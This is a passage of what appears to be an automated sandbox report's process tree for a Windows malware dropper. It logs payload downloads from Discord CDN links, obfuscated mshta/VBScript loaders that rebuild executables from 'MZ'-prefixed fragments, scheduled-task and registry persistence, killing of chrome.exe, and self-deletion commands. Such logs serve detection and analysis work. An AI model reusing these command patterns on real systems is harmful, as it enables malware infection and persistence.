-
C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe"C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe"8⤵PID:5408
-
-
C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"8⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp"C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp" /SL5="$A0058,506127,422400,C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"9⤵PID:6976
-
C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe" /S /UID=270910⤵PID:5988
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe"8⤵PID:1240
-
C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe" -u9⤵PID:3240
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe"C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe"8⤵PID:5448
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4296
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe"C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe"6⤵PID:5676
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\3EEB.bat "C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe""7⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""8⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""8⤵PID:4144
-
-
C:\Users\Admin\AppData\Local\Temp\28846\18.exe18.exe8⤵PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\28846\Transmissibility.exeTransmissibility.exe8⤵PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵PID:1120
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe"C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe"6⤵PID:5868
-
-
C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe"C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe"6⤵PID:5980
-
-
C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"6⤵PID:6008
-
C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"7⤵PID:3460
-
-
-
C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe"C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe"6⤵PID:6124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 4887⤵
- Program crash
PID:3756
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"6⤵PID:5924
-
C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"7⤵PID:1344
-
-
-
C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe"C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe"6⤵PID:5152
-
-
C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe"C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe"6⤵PID:1296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f8⤵
- Kills process with taskkill
PID:6088
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe"C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe"6⤵PID:4248
-
-
C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe"C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe"6⤵PID:2304
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:4768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe"C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe"6⤵PID:5984
-
-
C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe"C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe"6⤵PID:5864
-
-
C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe"C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe"6⤵PID:5528
-
-
C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe"C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe"6⤵PID:528
-
-
C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe"C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe"6⤵PID:5688
-
-
C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe"C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe"6⤵PID:5960
-
-
C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe"C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe"6⤵PID:5248
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:3768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe"C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe"6⤵PID:5472
-
-
C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe"C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe"6⤵PID:4320
-
C:\Users\Admin\AppData\Roaming\6555363.exe"C:\Users\Admin\AppData\Roaming\6555363.exe"7⤵PID:5352
-
-
C:\Users\Admin\AppData\Roaming\1231861.exe"C:\Users\Admin\AppData\Roaming\1231861.exe"7⤵PID:4484
-
-
C:\Users\Admin\AppData\Roaming\3771250.exe"C:\Users\Admin\AppData\Roaming\3771250.exe"7⤵PID:4296
-
-
C:\Users\Admin\AppData\Roaming\2114247.exe"C:\Users\Admin\AppData\Roaming\2114247.exe"7⤵PID:6756
-
-
C:\Users\Admin\AppData\Roaming\329851.exe"C:\Users\Admin\AppData\Roaming\329851.exe"7⤵PID:6664
-
C:\Users\Admin\AppData\Roaming\5341808.exe"C:\Users\Admin\AppData\Roaming\5341808.exe"8⤵PID:6320
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )9⤵PID:1644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\5341808.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\5341808.exe" ) do taskkill -IM "%~NxL" -F10⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM11⤵PID:4244
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )12⤵PID:5268
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F13⤵PID:5156
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))12⤵PID:4280
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly13⤵PID:4904
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"14⤵PID:4564
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\VYGDVP.ly14⤵PID:3236
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "5341808.exe" -F11⤵
- Kills process with taskkill
PID:7084
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\679400.exe"C:\Users\Admin\AppData\Roaming\679400.exe"8⤵PID:5720
-
-
-
C:\Users\Admin\AppData\Roaming\8035666.exe"C:\Users\Admin\AppData\Roaming\8035666.exe"7⤵PID:6832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe"C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe"6⤵PID:4508
-
-
C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"6⤵PID:4820
-
-
C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"6⤵PID:3924
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵PID:6008
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"7⤵PID:4688
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵PID:6040
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"6⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp"C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp" /SL5="$10404,506127,422400,C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"7⤵PID:4632
-
C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe" /S /UID=27098⤵PID:6904
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13073304e5395.exe4⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exeMon13073304e5395.exe5⤵
- Executes dropped EXE
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe4⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exeMon134ab4d3e88a4d3e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo4⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe4⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exeMon13a2838ed1d8384.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:316
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5716
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe4⤵PID:2184
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exeMon13248c3d7ea8c81.exe5⤵
- Executes dropped EXE
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe4⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13be6b39578.exe4⤵PID:1496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exeMon13be6b39578.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"2⤵PID:2824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\3⤵PID:5064
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\4⤵PID:4240
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F3⤵
- Creates scheduled task(s)
PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exeMon13bb1ac8986b773.exe1⤵
- Executes dropped EXE
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exeC:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe2⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo1⤵
- Executes dropped EXE
PID:4756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 7802⤵
- Program crash
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT1⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp" /SL5="$401D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT2⤵PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe" -u1⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp" /SL5="$401E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5056
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2992 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5020
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq &cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ+ M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F1⤵PID:3796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "2⤵PID:6052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"2⤵PID:5720
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\PcAKEO.F2⤵PID:2616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F3⤵PID:5024
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F5⤵PID:1724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe1⤵PID:4000
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6504 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\C48F.exeC:\Users\Admin\AppData\Local\Temp\C48F.exe1⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\C48F.exeC:\Users\Admin\AppData\Local\Temp\C48F.exe2⤵PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\F4D8.exeC:\Users\Admin\AppData\Local\Temp\F4D8.exe1⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\F4D8.exeC:\Users\Admin\AppData\Local\Temp\F4D8.exe2⤵PID:2588
-